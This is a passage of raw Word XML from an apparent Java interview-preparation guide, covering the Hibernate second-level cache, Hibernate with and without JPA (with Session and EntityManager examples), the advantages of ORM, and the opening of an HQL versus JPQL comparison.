    <w:p w14:paraId="206ADD6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xEntriesLocalHeap="1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB6E0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imeToLiveSeconds="3600" /&gt; &lt;!-- Time-to-live for cache entries --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779380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4066EF1C" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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onfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EFD01A"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560F417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2508CF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query_cache=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D965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provider_class=org.hibernate.cache.ehcache.EhCacheProvider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC2AB7"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enefits of Second-Level Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF9C67"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r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces database access by caching frequently used data, leading to faster application response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADFE0CE"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alability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps in scaling applications by reducing the load on the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFF9F4"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04E4EB8C"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configuration of the second-level cache can significantly improve the performance of your Hibernate-based applications, especially for read-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0E746" w14:textId="2E904E0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466" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46620EBB" w14:textId="05341CC4" w:rsidR="00B62C20" w:rsidRPr="00CE4B95" w:rsidRDefault="0068088E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="574" w:name="_Toc197867788"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we use Hibernate without JPA</w:t>
      </w:r>
      <w:r w:rsidR="00B62C20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574"/>
    </w:p>
    <w:p w14:paraId="46416E85" w14:textId="3812D766" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6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es,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can be used without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ere’s the breakdown of how Hibernate works with and without JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37DF92"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ibernate Without JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88C52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works as a standalone ORM framework, and you use its native API to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030005DF"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Hibernate can be configured using hibernate.cfg.xml or programmatically using the Configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EDDF01"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You create a SessionFactory from the Hibernate Configuration object, which manages the sessions and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A90FC89"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You directly interact with the database through the Hibernate Session object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734F613"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ions and XML Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate supports annotations for entity mappings (@Entity, @Table, etc.) as well as XML-based mapping files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D11CBB"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out JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62480600" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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Hibernate Configuration (hibernate.cfg.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B269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2CA31FC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090606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gt;org.hibernate.dialect.H2Dialect&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741DC5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gt;update&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE0A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gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCADB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format_sql"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2400628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3DCFA4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61E151C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1C0B693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CD0D4C5" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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727F8F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2B832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0F6996B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60C8481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E838B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79DD0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C6535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1D065B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62DAA559" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7906240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BA0A1B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C69CC44" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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 Management in Code</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE293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HibernateExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D10EF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4DC153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session factory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CDB9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Factory factory = new Configuration().configure("hibernate.cfg.xml").addAnnotatedClass(Product.class).buildSessionFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1FC7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95F205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pen session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5167C18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 session = factory.getCurrentSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14784C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6294E3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9AA79F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 object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C158E0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61F5D30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AE31A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tart transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB29EC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beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82992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33A4B0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the product object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E226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save(tempProduct);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B1D8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89199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5CA7834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getTransaction().commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216346C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78A01FC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factory.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F0186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2E595E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CB5121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82EAC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directly manages the Session and interacts with the database without using any JPA-specific annotations or classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75642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Hibernate With JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890FFA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When you use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xml:space="preserve">, Hibernate acts as the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA provider</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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With JPA, you interact with the EntityManager instead of Hibernate’s Session object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550FA2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Annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use JPA annotations such as @Entity, @Table, @Id, @GeneratedValue, etc. These are part of the JPA specification, but Hibernate supports them as a JPA provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98CD4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w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPA provides a more standardized way of configuring the persistence context, typically through persistence.xml or Spring’s application properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17072DD4"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 JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975D11F" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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 (persistence.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E4411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 xmlns="http://java.sun.com/xml/ns/persistence"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1FD5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mlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381320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si:schemaLocation="http://java.sun.com/xml/ns/persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69D3B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http://java.sun.com/xml/ns/persistence/persistence_2_0.xsd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC20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version="2.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29991CC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 name="myJpaUnit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F1DE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vider&gt;org.hibernate.jpa.HibernatePersistenceProvider&lt;/provider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E357A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lass&gt;com.example.Product&lt;/class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA770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44A5D43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 value="org.hibernate.dialect.H2Dialect"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB91C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 value="update"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A38D6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 value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31747EA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5D2BF5D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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A83B1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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E4D28" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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3BF2D2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D90789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5A6F594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7CC0CE9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0BC229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32BF31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BECFDD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DD2050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7D17D01B" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159791A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2BC42A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570D30" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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ing JPA EntityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A1CD9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JpaExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5819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7DD45E0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Factory emf = Persistence.createEntityManagerFactory("myJpaUnit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729623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 em = emf.createEntityManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A94F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F5680E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49BB0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Begin transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC1A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begin();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818864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FE4616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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A9AB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158F467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8E013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product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2771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persist(tempProduct);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132FD02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C521CE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652A7EA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commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4915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50BA35E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em.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B365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f.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073CF29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8329D9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8D549F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982FF25"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 Between Using Hibernate and JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182D855"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w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPA is an abstraction over the underlying ORM framework (like Hibernate). Hibernate can be used directly for more advanced or specific configurations, but JPA provides a more standardized API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B1D69A"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Vendor Independence</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPA allows you to switch between different JPA providers (e.g., Hibernate, EclipseLink) without changing much of the code, whereas Hibernate alone is tightly coupled to its own API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28827B62"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 vs. Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With JPA, you use EntityManager to perform database operations, while Hibernate uses Session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C42EB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141D97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467" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D9F7D" w14:textId="5867D662" w:rsidR="00B62C20" w:rsidRPr="00CE4B95" w:rsidRDefault="00C90147">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="575" w:name="_Toc197867789"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of ORM</w:t>
      </w:r>
      <w:r w:rsidR="00B62C20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="575"/>
    </w:p>
    <w:p w14:paraId="16B6FA55" w14:textId="767A3D64" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC78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 of ORM (Object-Relational Mapping):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE4295"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of Database Interactions</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D0E58"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bstracts the complexities of database interactions by mapping Java objects to database tables. Developers can work with objects in Java code without worrying about low-level SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C12F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Productivity</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10518FFD"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JPA) generate SQL queries automatically based on object models, reducing the need for repetitive SQL code and improving developer productivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D9E1A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976FFF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implified Data Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2464BAA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llows seamless conversion between Java objects and relational database entities, making it easier to manipulate data in Java objects rather than dealing with result sets from SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758F90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intainability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B57288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ith ORM, the codebase is cleaner and easier to maintain. Since Java objects and database tables are mapped, the code is more consistent, and developers can work with a higher-level abstraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BAEE2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duced Boilerplate Code</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33502F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eliminates the need for writing boilerplate code for database operations like connecting to the database, handling exceptions, and managing connections. ORM handles most of this automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26395FB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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218C80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built-in protection against SQL injection attacks because they use parameterized queries. The query generation is automatic and ensures that user inputs are correctly sanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE1C92"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Mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ABBB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provide built-in caching mechanisms (L1 and L2 cache), which can improve performance by reducing database load and speeding up data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE078E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548ACBD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integrate with transaction management mechanisms, allowing for better handling of transactional integrity. They support ACID properties (Atomicity, Consistency, Isolation, Durability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA9C6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Oriented Approach</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E304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Language (HQL, JPQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB24F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9364F0"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often support lazy loading, allowing related objects to be loaded only when required. This can optimize memory usage and performance by avoiding unnecessary data fetches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079420D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utomatic Table Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC56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can automatically generate database schema based on Java class annotations, saving time during database setup and ensuring synchronization between the model and the database schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4DA07E"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 Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912E161"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mechanisms to easily map relationships between entities (e.g., one-to-many, many-to-many), which would otherwise require complex SQL joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D3DC0" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC78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4816BDB9" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:p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sz w:val="22"/>
          <w:szCs w:val="22"/>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468" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A3E78" w14:textId="7CABB672" w:rsidR="00CC7822" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7822" w:rsidP="00CC7822">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="576" w:name="_Toc197867790"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HQL, JPQL and Native query?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="576"/>
    </w:p>
    <w:p w14:paraId="69C9E4FC" w14:textId="4370F6B6" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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main differences between </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HQL (Hibernate Query Languag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are related to their origins, syntax, and the context in which they are used. Here's a breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01628C84"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QL (Hibernate Query Language):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB545D2"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HQL is a query language specific to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It is object-oriented and works with Hibernate's persistent entities (i.e., Java objects mapped to database tables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1144670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HQL queries are written using Hibernate-specific objects (i.e., Entity classes) rather than database tables and columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08313F6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HQL queries are executed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
